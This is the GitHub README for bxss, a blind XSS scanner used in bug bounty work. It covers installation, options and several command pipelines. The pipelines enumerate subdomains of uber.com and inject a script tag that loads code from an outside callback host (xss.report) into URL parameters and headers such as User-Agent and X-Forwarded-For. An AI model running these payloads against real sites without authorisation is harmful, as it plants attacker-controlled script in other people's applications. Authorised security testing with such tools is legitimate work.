Skip to content

ethicalhackingplayground/bxss

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

35 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation


Bxss
Bxss - Blind XSS Scanner

Version License Go Report Card Go Reference


πŸš€ Description

Bxss is a high-performance Blind XSS scanner that automates the detection of blind XSS vulnerabilities in web applications.


✨ Features

  • Injects Blind XSS payloads into custom headers & parameters
  • Supports multiple HTTP methods (PUT, POST, GET, OPTIONS)
  • High-speed scanning with concurrency support
  • Easily chainable with other tools
  • Simple installation and usage

🧠 In Progress

We're actively working on integrating a Chromium-based worker pool to enhance the performance of bxss on low-end devices.

This feature will allow resource-intensive tasks, like DOM-based XSS detection or post-trigger payload inspection, to be offloaded to lightweight Chromium instances managed via a pool. By distributing the workload across multiple headless browser contexts in a controlled and efficient manner, bxss will remain responsive and usable even on lower-spec machines.

This will make bxss not only powerful but also highly accessible, regardless of system constraints.


βœ… TODOs

  • Chromium-based worker pool for DOM interaction and visual verification
  • Optional HTML/JSON reporting output
  • Add support for multi-platform payload customization (XSS Hunter, Interactsh, etc.)
  • Proxy support
  • Import custom requests

πŸ§ͺ Experimental Features

  • Trace mode (experimental)

πŸ“¦ Installation

go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

βš™οΈ Arguments

Argument Description Default
-a Append the payload to the parameter false
-c int Set the concurrency level 30
-H string Set a custom header ""
-hf string Path to file with headers ""
-p string The blind XSS payload ""
-pf string Path to file with payloads ""
-t Test parameters for blind XSS false
-X string HTTP method to use ""
-v Enable debug mode false
-rl float Rate limit (requests per second) 0
-f Follow redirects false
-l Enable Trace Mode (experimental) false

🎬 Demonstration

Demo


πŸ“ What is Trace mode?

Trace mode is an experimental feature that allows you to track where the BlindXSS got triggered, some third party BlindXSS platforms such as https://xss.report/ allows you to specify custom parameters in you're payloads, this allows you to track where the BlindXSS got triggered, for example if you specify the parameter url=https://somehost.com in your payload, the tool will use the payload

'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

for testing and upon a trigger you will be able to inspect the DOM and see what host the BlindXSS got triggered from.

Xss Report

Make sure when assigning custom parameters in you're dashboard that you assign url={LINK} so bxss can automatically replace {LINK} with the actual URL.

πŸ”₯ Usage Examples

Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

Append To Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

Both Headers & Parameters

subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

X-Forwarded-For Header

subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

Custom Headers & Parameters

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Google Dorks With Dorki

curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

Custom Headers & Parameters With Rate Limit

echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

For advanced dorking and vulnerability exploration, check out Dorki and sign up today!


β˜• Support the Project

If you get a bounty using this tool, consider supporting by buying me a coffee!

Buy Me A Coffee